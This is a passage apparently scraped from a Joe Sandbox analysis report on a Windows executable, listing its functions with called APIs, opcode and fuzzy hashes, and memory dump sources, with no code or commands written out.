                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: std::bad_alloc::bad_alloc
                                                                                        • String ID:
                                                                                        • API String ID: 1875163511-0
                                                                                        • Opcode ID: 7fdfb8b08260a68de66ecd622df27e98485fdb680c183650925e5cdb3d7d3185
                                                                                        • Instruction ID: be06ef600659acc9f2ab803f9af1d4ec0eb20854dfc0742a3b1a866fed01f08d
                                                                                        • Opcode Fuzzy Hash: 7fdfb8b08260a68de66ecd622df27e98485fdb680c183650925e5cdb3d7d3185
                                                                                        • Instruction Fuzzy Hash: C1318352E0C68651FB25DB16E5443BD67A0FBE0B84F544032F26C866E5EF7CD98AC301
                                                                                        Function 00007FF6FE193D34 Relevance: 4.6, APIs: 3, Instructions: 62COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: AttributesFile$_invalid_parameter_noinfo_noreturn
                                                                                        • String ID:
                                                                                        • API String ID: 1203560049-0
                                                                                        • Opcode ID: 9ad1da1d281fb88a90e37ecd930f681ad4649b1953909ec7c8adb17a28908e15
                                                                                        • Instruction ID: f0a20377fee26c91904798823c2a11d3be9ab49962bd890ec76224ab0fea2af0
                                                                                        • Opcode Fuzzy Hash: 9ad1da1d281fb88a90e37ecd930f681ad4649b1953909ec7c8adb17a28908e15
                                                                                        • Instruction Fuzzy Hash: 6D21B822F1878141EB20CF26E45526D6761FFD8794F505230FAAE876D9FF2CD544C600
                                                                                        Function 00007FF6FE1931BC Relevance: 4.6, APIs: 3, Instructions: 59fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: DeleteFile$_invalid_parameter_noinfo_noreturn
                                                                                        • String ID:
                                                                                        • API String ID: 3118131910-0
                                                                                        • Opcode ID: 72c673f2880adfe6ea93f0d9f4cbebf29628e435fcdd813aa7a5852a82454db7
                                                                                        • Instruction ID: 412abcea134be9c0d0f3b9b8cdd9105c09bd3da0d7221f1c83c9257b4b2b4390
                                                                                        • Opcode Fuzzy Hash: 72c673f2880adfe6ea93f0d9f4cbebf29628e435fcdd813aa7a5852a82454db7
                                                                                        • Instruction Fuzzy Hash: EA218822E1878181EF10CB26F44516E6761FBD9B94F501231FAAE866E9EF3CE541C600
                                                                                        Function 00007FF6FE1932BC Relevance: 4.6, APIs: 3, Instructions: 57COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: AttributesFile$_invalid_parameter_noinfo_noreturn
                                                                                        • String ID:
                                                                                        • API String ID: 1203560049-0
                                                                                        • Opcode ID: 40ad9405655d088623e5613f9ff1dd24c057f9c22428089c7716efbf5db7ae43
                                                                                        • Instruction ID: a171695bcf903d0abf4abf5fedfc6baa2d583632fdb49af85228d44ac82a2530
                                                                                        • Opcode Fuzzy Hash: 40ad9405655d088623e5613f9ff1dd24c057f9c22428089c7716efbf5db7ae43
                                                                                        • Instruction Fuzzy Hash: 38213222E1878181EB10DB2AE44516D6761FBD9BA4F500231FAAE87BE9EF3CD545C604
                                                                                        Function 00007FF6FE1BBF64 Relevance: 4.5, APIs: 3, Instructions: 19COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$CurrentExitTerminate
                                                                                        • String ID:
                                                                                        • API String ID: 1703294689-0
                                                                                        • Opcode ID: 44b3a526fe0d15710854bc957cc7a82f9edee4cc7420f0560de4bec5ea2a17a0
                                                                                        • Instruction ID: 429e94813086885b67bad502069a1e311f643a393003548741d9cbf44be03ee8
                                                                                        • Opcode Fuzzy Hash: 44b3a526fe0d15710854bc957cc7a82f9edee4cc7420f0560de4bec5ea2a17a0
                                                                                        • Instruction Fuzzy Hash: 60E01A24F043054AEB64EF2698D57B92B52AFE8741F10543CE86EC27D6EE3DE8098600
                                                                                        Function 00007FF6FE18F578 Relevance: 3.2, APIs: 2, Instructions: 193COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6FE18F895
                                                                                        • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6FE18F89B
                                                                                          • Part of subcall function 00007FF6FE193EC8: FindClose.KERNEL32(?,?,00000000,00007FF6FE1A0811), ref: 00007FF6FE193EFD
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo_noreturn$CloseFind
                                                                                        • String ID:
                                                                                        • API String ID: 3587649625-0
                                                                                        • Opcode ID: 21c46d77b950ea35bda2759f2243ea4bc63597e1e47bf800543df0ca52747642
                                                                                        • Instruction ID: 05c53565fcfa9457c505c8281f36d1915c1b6f7f6c77cd9e3ff9460681ee16d3
                                                                                        • Opcode Fuzzy Hash: 21c46d77b950ea35bda2759f2243ea4bc63597e1e47bf800543df0ca52747642
                                                                                        • Instruction Fuzzy Hash: C591B172E18B8580EB10DF26D4441AD6B61FBE9798F904135FA6C87AE9EF7CD685C300
                                                                                        Function 00007FF6FE183904 Relevance: 3.1, APIs: 2, Instructions: 124COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo_noreturn
                                                                                        • String ID:
                                                                                        • API String ID: 3668304517-0
                                                                                        • Opcode ID: d8910a2eb58a838c5587a3fb2cf76da8f141fd94dedfaf734860978819007f6c
                                                                                        • Instruction ID: 17dd1c593271ec43ad80f2da1141a4d09fa93d10bdb5c6b0f83d6ec9e9275a5d
                                                                                        • Opcode Fuzzy Hash: d8910a2eb58a838c5587a3fb2cf76da8f141fd94dedfaf734860978819007f6c
                                                                                        • Instruction Fuzzy Hash: D241A662F1865284FB00DBB2D4402BD2B21AFE4B94F185235FE2EA7BD9EE389545C300
                                                                                        Function 00007FF6FE192778 Relevance: 3.1, APIs: 2, Instructions: 100COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SetFilePointer.KERNELBASE(00000000,00000002,?,00000F99,?,00007FF6FE19274D), ref: 00007FF6FE1928A9
                                                                                        • GetLastError.KERNEL32(?,00007FF6FE19274D), ref: 00007FF6FE1928B8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorFileLastPointer
                                                                                        • String ID:
                                                                                        • API String ID: 2976181284-0
                                                                                        • Opcode ID: 043a82e8aff847b2e282b78885e55c7214a93c585b530bdf19c19deffc600893
                                                                                        • Instruction ID: df9fc658154c3a992133dbe195d5d2561d41dd9f5ff0fab6c5397ce2315826b0
                                                                                        • Opcode Fuzzy Hash: 043a82e8aff847b2e282b78885e55c7214a93c585b530bdf19c19deffc600893
                                                                                        • Instruction Fuzzy Hash: 4B317422F1955682FB60CA6BE5406BD6B94AFE4BD4F140131EE2D977E4EE3CE481C640
                                                                                        Function 00007FF6FE1822BC Relevance: 3.1, APIs: 2, Instructions: 83COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: Item_invalid_parameter_noinfo_noreturn
                                                                                        • String ID:
                                                                                        • API String ID: 1746051919-0
                                                                                        • Opcode ID: 5a2890223aea6d88e53338121990f25a14a9249d0429ebf34ef8f54134bab86e
                                                                                        • Instruction ID: 74372b66569041d74925d5003f66db46109aff880230b05a0899ac2293295ddd
                                                                                        • Opcode Fuzzy Hash: 5a2890223aea6d88e53338121990f25a14a9249d0429ebf34ef8f54134bab86e
                                                                                        • Instruction Fuzzy Hash: C931B022E1874182EB21CB16E4543AAB761EBE8790F404231FAAD87BE5EF3CE544C700
                                                                                        Function 00007FF6FE192AD0 Relevance: 3.1, APIs: 2, Instructions: 76timeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$BuffersFlushTime
                                                                                        • String ID:
                                                                                        • API String ID: 1392018926-0
                                                                                        • Opcode ID: 1f7bfd0f82637a6abdcd08aef8b442a865f6f50d97ba3a1fa7ef62b0e093425a
                                                                                        • Instruction ID: 0edc0d719b239e331a750b00dcee6b264b3c57ff2ec87afd7c48882857cdacc4
                                                                                        • Opcode Fuzzy Hash: 1f7bfd0f82637a6abdcd08aef8b442a865f6f50d97ba3a1fa7ef62b0e093425a
                                                                                        • Instruction Fuzzy Hash: 9D219C22E09B4291FB62CE12E4447BE5AD4BFE2794F154031EE5D862D9FE3CE48AC200
                                                                                        Function 00007FF6FE19AAE0 Relevance: 3.1, APIs: 2, Instructions: 52COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: LoadString
                                                                                        • String ID:
                                                                                        • API String ID: 2948472770-0
                                                                                        • Opcode ID: efc1550bd5bba1d5ac9face2304fa075ed5e4cb94ffc19493764f318ca00d951
                                                                                        • Instruction ID: cfcf177912ebda7be002e9751db7d3ef48a66c573a91c948cd9204314cfa56c1
                                                                                        • Opcode Fuzzy Hash: efc1550bd5bba1d5ac9face2304fa075ed5e4cb94ffc19493764f318ca00d951
                                                                                        • Instruction Fuzzy Hash: 83114F61F08A5285E700CF17A8441697BA1BBE8FD0F544535EA2EE3BA4EF7CE5518344
                                                                                        Function 00007FF6FE192BB0 Relevance: 3.0, APIs: 2, Instructions: 47COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorFileLastPointer
                                                                                        • String ID:
                                                                                        • API String ID: 2976181284-0
                                                                                        • Opcode ID: 5eda2cbf1ce6837a88d649c872729f31e823bc49095d59e5e9b193bf7b9166cd
                                                                                        • Instruction ID: 0a924dc8e39341a8f6f81dd7c52fe6be76a985abf4fdcd611eeeffaeabc3643e
                                                                                        • Opcode Fuzzy Hash: 5eda2cbf1ce6837a88d649c872729f31e823bc49095d59e5e9b193bf7b9166cd
                                                                                        • Instruction Fuzzy Hash: C0116621E0864181FB60CB26E44166D6A50FBE5BA4F544331FA7D966D8EF3CE592C300
                                                                                        Function 00007FF6FE18255C Relevance: 3.0, APIs: 2, Instructions: 37COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: ItemRectTextWindow$Clientswprintf
                                                                                        • String ID:
                                                                                        • API String ID: 3322643685-0
                                                                                        • Opcode ID: ad94589889145b650e3461eb84003e845283bd92425fc2a9221c8100a4e27e71
                                                                                        • Instruction ID: 49b4b16e48707fa4a9581746c53916f79093e076078c2674e58b22d3e8aecaac
                                                                                        • Opcode Fuzzy Hash: ad94589889145b650e3461eb84003e845283bd92425fc2a9221c8100a4e27e71
                                                                                        • Instruction Fuzzy Hash: 5E01B160E0D64B41FF4ADB53A4682BA1F916FE5740F080032F82D866D9FE6CF985C300
                                                                                        Function 00007FF6FE19EB58 Relevance: 3.0, APIs: 2, Instructions: 23COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetCurrentProcess.KERNEL32(?,?,?,?,00007FF6FE19EBAD,?,?,?,?,00007FF6FE195752,?,?,?,00007FF6FE1956DE), ref: 00007FF6FE19EB5C
                                                                                        • GetProcessAffinityMask.KERNEL32 ref: 00007FF6FE19EB6F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$AffinityCurrentMask
                                                                                        • String ID:
                                                                                        • API String ID: 1231390398-0
                                                                                        • Opcode ID: 444071b75e142e51b736d9fa504759652bc9944b894df1f8101a797a07211085
                                                                                        • Instruction ID: e3a6573e25e804eb265285eb0adacb32d6b1aa53d43cb174ea8fdfb41e22d8d1
                                                                                        • Opcode Fuzzy Hash: 444071b75e142e51b736d9fa504759652bc9944b894df1f8101a797a07211085
                                                                                        • Instruction Fuzzy Hash: B5E06561F1458646DB59CB5AC8915EE67D2BFD8B40F848036E60BC3658EE2DE5458B00
                                                                                        Function 00007FF6FE1B21D0 Relevance: 3.0, APIs: 2, Instructions: 21COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: Concurrency::cancel_current_task$std::bad_alloc::bad_alloc
                                                                                        • String ID:
                                                                                        • API String ID: 1173176844-0
                                                                                        • Opcode ID: 14867973fed18b2c44dc58e1bcd5f94848bfca26dcf41195b9c376eff134a452
                                                                                        • Instruction ID: 299d420f276d8c67eea961faec1309638e001a79fa79ff66eb47908ccc7dcb88
                                                                                        • Opcode Fuzzy Hash: 14867973fed18b2c44dc58e1bcd5f94848bfca26dcf41195b9c376eff134a452
                                                                                        • Instruction Fuzzy Hash: 96E0BD40E0A10B45FB28B26719261B509405FF93B0E185B30FA3EC87D6BE1CA59AC110
                                                                                        Function 00007FF6FE1BD90C Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorFreeHeapLast
                                                                                        • String ID:
                                                                                        • API String ID: 485612231-0
                                                                                        • Opcode ID: 7829e02dcbd74b51c5e196648e5aad52518f68633834b7095f7e5950a32ae739
                                                                                        • Instruction ID: a2866ead9f66773e097c2ecab2c0829de5c470008dd0085dbc5232441c33fd63
                                                                                        • Opcode Fuzzy Hash: 7829e02dcbd74b51c5e196648e5aad52518f68633834b7095f7e5950a32ae739
                                                                                        • Instruction Fuzzy Hash: F6E0B665F0950786FF1CEBB398451B91AA16FF8B55B044034E92EC63D2FE2CA4968A00
                                                                                        Function 00007FF6FE1833E4 Relevance: 1.8, APIs: 1, Instructions: 328COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
